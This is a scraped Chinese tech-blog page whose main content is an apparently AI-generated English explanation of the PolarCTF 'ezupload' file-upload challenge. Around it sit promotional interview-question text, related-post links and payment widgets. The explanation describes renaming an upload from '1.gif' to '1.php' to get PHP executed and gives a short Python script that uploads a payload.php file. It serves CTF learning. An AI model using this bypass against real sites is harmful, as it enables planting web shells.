还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
2023PolarCTF——Crypto—wp
m0_73550830的博客
09-29 401
DexterJie’Blog
polarctf uploader
01-09
### PolarCTF Uploader Documentation and Resources In the context of CTF (Capture The Flag) competitions, challenges like "ezupload" from PolarCTF provide a platform to test skills in web security, particularly focusing on file upload vulnerabilities. Modifying `Content-Disposition: form-data; name="userfile"; filename="1.gif"` to use `filename="1.php"` suggests an attempt to exploit server-side processing flaws where PHP files might be executed instead of treated as regular uploads[^1]. For detailed documentation or resources specifically about **PolarCTF uploader**, one should look into several areas: #### Understanding File Upload Vulnerabilities File upload mechanisms can introduce significant risks if not properly secured. Security researchers often document common pitfalls including improper validation checks that allow attackers to bypass restrictions intended to prevent malicious content such as executable scripts being uploaded under guise of benign formats like images. #### Learning From Past Challenges Communities surrounding platforms hosting similar events frequently share write-ups post-event which detail solutions found during competition timeframes. These serve both educational purposes for newcomers learning cybersecurity principles while also offering insights into how experienced players approached problems presented within specific games like PolarCTF. #### Exploring Official Event Pages & Forums Organizers typically maintain websites dedicated to their respective contests wherein participants may find official rulesets alongside any supplementary materials provided by challenge creators themselves. Additionally, forums associated with these sites offer spaces for discussion among peers regarding strategies employed throughout various rounds. ```python import requests url = 'http://example.com/upload' files = {'userfile': ('1.php', open('payload.php', 'rb'))} response = requests.post(url, files=files) print(response.text) ``` This code snippet demonstrates sending a POST request with altered headers mimicking what was described earlier but using Python's `requests` library rather than manually crafting HTTP packets. Note this is purely illustrative; actual exploitation would violate terms-of-service agreements set forth by most online services unless explicit permission has been granted through sanctioned testing environments designed explicitly for training exercises. --related questions-- 1. What are key considerations when designing secure file upload functionality? 2. How do modern frameworks mitigate against typical attack vectors seen in file handling routines? 3. Can you recommend reputable sources for studying past CTF challenges related to web application security? 4. In what ways does altering MIME types impact server behavior concerning uploaded files?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值